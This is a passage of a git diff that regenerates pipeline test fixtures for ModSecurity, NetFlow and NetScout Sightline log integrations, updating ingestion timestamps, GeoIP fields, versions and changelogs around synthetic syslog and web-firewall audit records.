must-revalidate\",\"ETag\":\"W/\\\"4b55096b2de9c691c0e0f67a496dc7d9\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:01 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"b7220068-a82e-4535-be4c-a087fe3901ed\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.029745\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" @@ -161,22 +187,7 @@ "access" ], "kind": "event" - } - }, - { - "modsec": { - "audit": { - "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" - } }, - "rule": { - "id": "920350" - }, - "source": { - "port": 45952, - "ip": "67.43.156.15" - }, - "message": "Host header is a numeric IP address", "url": { "path": "/", "original": "https://34.87.56.16:443/", @@ -186,11 +197,21 @@ }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2021-05-14T15:12:18.000Z", + "modsec": { + "audit": { + "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" + } + }, "ecs": { "version": "1.12.0" }, + "rule": { + "id": "920350" + }, "http": { "request": { "method": "GET" @@ -201,8 +222,25 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "port": 45952, + "ip": "67.43.156.15" + }, + "message": "Host header is a numeric IP address", "event": { - "ingested": "2021-12-09T13:41:30.595009200Z", + "ingested": "2021-12-14T14:48:26.828828395Z", "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:12:18 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":45952,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100513893.802359\",\"request\":{\"method\":\"GET\",\"http_version\":1.0,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"f7e5c631964147f2a3458c4f97647883\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:18 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.026203\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" @@ -211,7 +249,17 @@ "access" ], "kind": "event" - } + }, + "url": { + "path": "/", + "original": "https://34.87.56.16:443/", + "scheme": "https", + "port": 443, + "domain": "34.87.56.16" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/modsecurity/manifest.yml b/packages/modsecurity/manifest.yml index daf276bcab7..34dcf9874ab 100644 --- a/packages/modsecurity/manifest.yml +++ b/packages/modsecurity/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: modsecurity title: "ModSecurity Audit" -version: 0.1.2 +version: 0.1.3 license: basic description: "ModSecuirty Audit Log Integration" type: integration diff --git a/packages/netflow/data_stream/log/_dev/test/pipeline/test-netflow-log-events.json-expected.json b/packages/netflow/data_stream/log/_dev/test/pipeline/test-netflow-log-events.json-expected.json index b0f1553bb7e..24b53f37dc0 100644 --- a/packages/netflow/data_stream/log/_dev/test/pipeline/test-netflow-log-events.json-expected.json +++ b/packages/netflow/data_stream/log/_dev/test/pipeline/test-netflow-log-events.json-expected.json @@ -92,7 +92,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591123200Z", + "ingested": "2021-12-15T08:59:39.365270791Z", "category": "network_session", "type": [ "connection" @@ -197,7 +197,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591151400Z", + "ingested": "2021-12-15T08:59:39.365275155Z", "category": "network_session", "type": [ "connection" @@ -302,7 +302,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591160800Z", + "ingested": "2021-12-15T08:59:39.365292467Z", "category": "network_session", "type": [ "connection" @@ -407,7 +407,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591176100Z", + "ingested": "2021-12-15T08:59:39.365294369Z", "category": "network_session", "type": [ "connection" @@ -512,7 +512,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591183600Z", + "ingested": "2021-12-15T08:59:39.365295976Z", "category": "network_session", "type": [ "connection" @@ -617,7 +617,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591190400Z", + "ingested": "2021-12-15T08:59:39.365297619Z", "category": "network_session", "type": [ "connection" @@ -722,7 +722,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591197200Z", + "ingested": "2021-12-15T08:59:39.365299534Z", "category": "network_session", "type": [ "connection" @@ -827,7 +827,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591227600Z", + "ingested": "2021-12-15T08:59:39.365301307Z", "category": "network_session", "type": [ "connection" @@ -932,7 +932,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591239300Z", + "ingested": "2021-12-15T08:59:39.365303044Z", "category": "network_session", "type": [ "connection" @@ -1037,7 +1037,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591246900Z", + "ingested": "2021-12-15T08:59:39.365304539Z", "category": "network_session", "type": [ "connection" @@ -1142,7 +1142,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591255Z", + "ingested": "2021-12-15T08:59:39.365306094Z", "category": "network_session", "type": [ "connection" @@ -1247,7 +1247,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591262300Z", + "ingested": "2021-12-15T08:59:39.365307825Z", "category": "network_session", "type": [ "connection" @@ -1352,7 +1352,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591269200Z", + "ingested": "2021-12-15T08:59:39.365309579Z", "category": "network_session", "type": [ "connection" @@ -1457,7 +1457,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591275300Z", + "ingested": "2021-12-15T08:59:39.365311253Z", "category": "network_session", "type": [ "connection" @@ -1562,7 +1562,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591295600Z", + "ingested": "2021-12-15T08:59:39.365312780Z", "category": "network_session", "type": [ "connection" @@ -1667,7 +1667,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591307200Z", + "ingested": "2021-12-15T08:59:39.365314319Z", "category": "network_session", "type": [ "connection" @@ -1772,7 +1772,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591315100Z", + "ingested": "2021-12-15T08:59:39.365315977Z", "category": "network_session", "type": [ "connection" @@ -1877,7 +1877,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591321900Z", + "ingested": "2021-12-15T08:59:39.365317688Z", "category": "network_session", "type": [ "connection" @@ -1982,7 +1982,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591328100Z", + "ingested": "2021-12-15T08:59:39.365319735Z", "category": "network_session", "type": [ "connection" @@ -2087,7 +2087,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591335300Z", + "ingested": "2021-12-15T08:59:39.365321582Z", "category": "network_session", "type": [ "connection" @@ -2192,7 +2192,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591341900Z", + "ingested": "2021-12-15T08:59:39.365323427Z", "category": "network_session", "type": [ "connection" @@ -2297,7 +2297,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591349Z", + "ingested": "2021-12-15T08:59:39.365325170Z", "category": "network_session", "type": [ "connection" @@ -2402,7 +2402,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591355200Z", + "ingested": "2021-12-15T08:59:39.365326842Z", "category": "network_session", "type": [ "connection" @@ -2507,7 +2507,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591363500Z", + "ingested": "2021-12-15T08:59:39.365328474Z", "category": "network_session", "type": [ "connection" @@ -2612,7 +2612,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591370400Z", + "ingested": "2021-12-15T08:59:39.365330156Z", "category": "network_session", "type": [ "connection" @@ -2717,7 +2717,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591376500Z", + "ingested": "2021-12-15T08:59:39.365331810Z", "category": "network_session", "type": [ "connection" @@ -2822,7 +2822,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591382700Z", + "ingested": "2021-12-15T08:59:39.365334351Z", "category": "network_session", "type": [ "connection" @@ -2927,7 +2927,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591389200Z", + "ingested": "2021-12-15T08:59:39.365336271Z", "category": "network_session", "type": [ "connection" @@ -3032,7 +3032,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591395100Z", + "ingested": "2021-12-15T08:59:39.365337971Z", "category": "network_session", "type": [ "connection" diff --git a/packages/netscout/changelog.yml b/packages/netscout/changelog.yml index ec2916934c1..195aaa20a86 100644 --- a/packages/netscout/changelog.yml +++ b/packages/netscout/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/netscout/data_stream/sightline/_dev/test/pipeline/test-generated.log-expected.json b/packages/netscout/data_stream/sightline/_dev/test/pipeline/test-generated.log-expected.json index 75260febcc9..e9b389a2c6f 100644 --- a/packages/netscout/data_stream/sightline/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/netscout/data_stream/sightline/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 29 06:09:59 pfsp: The configuration was changed on leader olab to version 1.6078 by rci", "event": { - "ingested": "2021-06-09T12:10:11.780622500Z" + "ingested": "2021-12-14T14:48:29.264346650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 12 13:12:33 pfsp: Alert Autoclassification was restarted on 2016-02-12 13:12:33 uredolor by tatemac", "event": { - "ingested": "2021-06-09T12:10:11.780646700Z" + "ingested": "2021-12-14T14:48:29.264349144Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 ntsunti: Change Log: Username:nseq, Subsystem:itinvol, Setting Type:psa, Message:umq", "event": { - "ingested": "2021-06-09T12:10:11.780654500Z" + "ingested": "2021-12-14T14:48:29.264349632Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 12 03:17:42 pfsp: Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780685100Z" + "ingested": "2021-12-14T14:48:29.264350050Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 26 10:20:16 pfsp: Alert Device ritquiin unreachable by controller umqui since 2016-03-26 10:20:16", "event": { - "ingested": "2021-06-09T12:10:11.780691800Z" + "ingested": "2021-12-14T14:48:29.264350427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 9 17:22:51 pfsp: Alert Host Detection alert riosam, start 2016-04-9 17:22:51 anonnu, duration 116.480000, direction external, host 10.51.132.10, signatures (utper), impact squame, importance medium, managed_objects (omm), (parent managed object iin)", "event": { - "ingested": "2021-06-09T12:10:11.780698200Z" + "ingested": "2021-12-14T14:48:29.264350819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 pfsp: Autoclassification was restarted on 2016-04-24 00:25:25 nim by incidi", "event": { - "ingested": "2021-06-09T12:10:11.780705Z" + "ingested": "2021-12-14T14:48:29.264351215Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 8 07:27:59 pfsp: Alert Peakflow device oloremqu unreachable by temvel since 2016-05-08 07:27:59", "event": { - "ingested": "2021-06-09T12:10:11.780710500Z" + "ingested": "2021-12-14T14:48:29.264351591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 22 14:30:33 pfsp: Autoclassification was restarted on 2016-05-22 14:30:33 serror by anti", "event": { - "ingested": "2021-06-09T12:10:11.780715800Z" + "ingested": "2021-12-14T14:48:29.264351965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 5 21:33:08 pfsp: script ufugiatn ran at 2016-06-05 21:33:08 tionulam, leader uameius", "event": { - "ingested": "2021-06-09T12:10:11.780721100Z" + "ingested": "2021-12-14T14:48:29.264352350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 pfsp: Alert Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780726900Z" + "ingested": "2021-12-14T14:48:29.264352726Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 4 11:38:16 pfsp: configuration was changed on leader uipexea to version 1.5162 by nci", "event": { - "ingested": "2021-06-09T12:10:11.780732300Z" + "ingested": "2021-12-14T14:48:29.264353401Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 pfsp: The SNMP restored for router mvolu, leader radip at 2016-07-18 18:40:50 tNequ", "event": { - "ingested": "2021-06-09T12:10:11.780737200Z" + "ingested": "2021-12-14T14:48:29.264353774Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2 01:43:25 tatno: Protection Mode: Changed protection mode to active for protection groupdquiac,URL:https://mail.example.net/uam/untutl.jpg?llu=uptassi#tamremap", "event": { - "ingested": "2021-06-09T12:10:11.780742400Z" + "ingested": "2021-12-14T14:48:29.264354149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 16 08:45:59 pfsp: Alert script estqui ran at 2016-08-16 08:45:59 uasiarch, leader emaper", "event": { - "ingested": "2021-06-09T12:10:11.780747400Z" + "ingested": "2021-12-14T14:48:29.264354518Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 30 15:48:33 eum: Blocked Host: Blocked host10.66.171.247atsitby Blocked Countries usingudpdestination10.155.162.162,URL:https://www5.example.org/seq/olorema.jpg?quid=fug#uatDuis", "event": { - "ingested": "2021-06-09T12:10:11.780752200Z" + "ingested": "2021-12-14T14:48:29.264354894Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 13 22:51:07 pfsp: Alert TMS 'eip' fault for resource 'lupta' on TMS iusmodt", "event": { - "ingested": "2021-06-09T12:10:11.780757300Z" + "ingested": "2021-12-14T14:48:29.264355409Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 28 05:53:42 pfsp: Alert Autoclassification was restarted on 2016-09-28 05:53:42 atatnonp by uiano", "event": { - "ingested": "2021-06-09T12:10:11.780762200Z" + "ingested": "2021-12-14T14:48:29.264355798Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 12 12:56:16 temq: Blocked Host: Blocked host10.38.77.13ataquaeabby Blocked Countries usingipv6-icmpdestination10.179.26.34,URL:https://example.org/isiu/nimadmi.gif?ari=equun#suntinc", "event": { - "ingested": "2021-06-09T12:10:11.780767200Z" + "ingested": "2021-12-14T14:48:29.264356176Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 26 19:58:50 pfsp: Hardware failure on tatevel since 2016-10-26 19:58:50 GMT: abilloi", "event": { - "ingested": "2021-06-09T12:10:11.780772600Z" + "ingested": "2021-12-14T14:48:29.264356568Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 10 03:01:24 pfsp: The anomaly ore id 2933 status tsed severity very-high classification enimad router incididu router_name eci interface aali interface_name \"lo5882\" porainc", "event": { - "ingested": "2021-06-09T12:10:11.780784100Z" + "ingested": "2021-12-14T14:48:29.264356957Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 24 10:03:59 moll: anomaly: anomaly Bandwidth id 2902 status inim severity high classification deomni router tquovol router_name ntsuntin interface aecatcup interface_name \"lo4987\" oluptate", "event": { - "ingested": "2021-06-09T12:10:11.780789400Z" + "ingested": "2021-12-14T14:48:29.264357330Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 8 17:06:33 pfsp: Alert Autoclassification was restarted on 2016-12-08 17:06:33 iam by qua", "event": { - "ingested": "2021-06-09T12:10:11.780794500Z" + "ingested": "2021-12-14T14:48:29.264357713Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 23 00:09:07 pfsp: Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780799900Z" + "ingested": "2021-12-14T14:48:29.264358208Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 6 07:11:41 pfsp: Autoclassification was restarted on 2017-01-06 07:11:41 olupta by turveli", "event": { - "ingested": "2021-06-09T12:10:11.780805200Z" + "ingested": "2021-12-14T14:48:29.264358595Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 20 14:14:16 pfsp: Alert Autoclassification was restarted on 2017-01-20 14:14:16 ntutl by caecatc", "event": { - "ingested": "2021-06-09T12:10:11.780809800Z" + "ingested": "2021-12-14T14:48:29.264358969Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 3 21:16:50 pfsp: Alert GRE tunnel restored for destination 10.224.68.213, leader taed at 2017-02-03 21:16:50 lup", "event": { - "ingested": "2021-06-09T12:10:11.780814600Z" + "ingested": "2021-12-14T14:48:29.264359344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 18 04:19:24 pfsp: Alert Hardware failure on aperi since 2017-02-18 04:19:24 GMT: lor", "event": { - "ingested": "2021-06-09T12:10:11.780820500Z" + "ingested": "2021-12-14T14:48:29.264359721Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 4 11:21:59 pfsp: The BGP Instability for router oin ended", "event": { - "ingested": "2021-06-09T12:10:11.780825400Z" + "ingested": "2021-12-14T14:48:29.264360111Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 18 18:24:33 pfsp: Hardware failure on ritatis done at 2017-03-18 18:24:33 oloremi GMT: pitla", "event": { - "ingested": "2021-06-09T12:10:11.780830100Z" + "ingested": "2021-12-14T14:48:29.264360477Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2 01:27:07 eomnisis: Change Log: Username:mqui, Subsystem:civeli, Setting Type:errorsi, Message:des", "event": { - "ingested": "2021-06-09T12:10:11.780835100Z" + "ingested": "2021-12-14T14:48:29.264360861Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 pfsp: Device tdolorem unreachable by controller ono since 2017-04-16 08:29:41", "event": { - "ingested": "2021-06-09T12:10:11.780839500Z" + "ingested": "2021-12-14T14:48:29.264361228Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 30 15:32:16 pfsp: The GRE tunnel down for destination 10.60.185.151, leader uidolo since 2017-04-30 15:32:16 lumquido", "event": { - "ingested": "2021-06-09T12:10:11.780843700Z" + "ingested": "2021-12-14T14:48:29.264361604Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 14 22:34:50 Lor: Test: Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780850100Z" + "ingested": "2021-12-14T14:48:29.264361981Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 29 05:37:24 pfsp: Alert script modoco ran at 2017-05-29 05:37:24 , leader estqu", "event": { - "ingested": "2021-06-09T12:10:11.780854500Z" + "ingested": "2021-12-14T14:48:29.264362473Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 intoccae: Protection Mode: Changed protection mode to active for protection groupents,URL:https://www.example.net/nse/sinto.gif?CSed=lupt#psaquae", "event": { - "ingested": "2021-06-09T12:10:11.780858500Z" + "ingested": "2021-12-14T14:48:29.264362877Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 26 19:42:33 pfsp: The BGP Trap reetd: Prefix lumqui itinvo mdolore", "event": { - "ingested": "2021-06-09T12:10:11.780862600Z" + "ingested": "2021-12-14T14:48:29.264363277Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 11 02:45:07 pfsp: Device mque reachable again by controller uovolup at 2017-07-11 02:45:07 samvolu", "event": { - "ingested": "2021-06-09T12:10:11.780866800Z" + "ingested": "2021-12-14T14:48:29.264363678Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 25 09:47:41 pfsp: The Host Detection alert eirure, start 2017-07-25 09:47:41 conseq, duration 38.117000, stop 2017-07-25 09:47:41 mpori, , importance very-high, managed_objects (atu), is now unknown, (parent managed object lpaqui)", "event": { - "ingested": "2021-06-09T12:10:11.780870700Z" + "ingested": "2021-12-14T14:48:29.264364051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 8 16:50:15 pfsp: BGP Trap doloremi: Prefix luptasn hitect dol", "event": { - "ingested": "2021-06-09T12:10:11.780874700Z" + "ingested": "2021-12-14T14:48:29.264365438Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 22 23:52:50 nsecte: BGP: ipv6 instability router tincu threshold ari (exercit) observed sci (quamnih)", "event": { - "ingested": "2021-06-09T12:10:11.780878700Z" + "ingested": "2021-12-14T14:48:29.264365872Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 6 06:55:24 emoe: Protection Mode: Changed protection mode to active for protection groupeaq,URL:https://mail.example.net/corp/modtemp.jpg?oluptas=tNequepo#lup", "event": { - "ingested": "2021-06-09T12:10:11.780882600Z" + "ingested": "2021-12-14T14:48:29.264366256Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 20 13:57:58 evita: Change Log: Username:suntexp, Subsystem:duntut, Setting Type:magni, Message:pisciv", "event": { - "ingested": "2021-06-09T12:10:11.780886800Z" + "ingested": "2021-12-14T14:48:29.264366624Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 radipisc: Blocked Host: Blocked host10.136.232.108atabiby Blocked Countries usingrdpdestination10.168.131.247,URL:https://example.net/temqu/edol.jpg?ipi=reseos#pariatu", "event": { - "ingested": "2021-06-09T12:10:11.780891100Z" + "ingested": "2021-12-14T14:48:29.264367003Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 19 04:03:07 pfsp: GRE tunnel restored for destination 10.209.182.237, leader tper at 2017-10-19 04:03:07 olor", "event": { - "ingested": "2021-06-09T12:10:11.780895200Z" + "ingested": "2021-12-14T14:48:29.264367383Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2 11:05:41 pfsp: Alert Device xerc reachable again by controller iutali at 2017-11-02 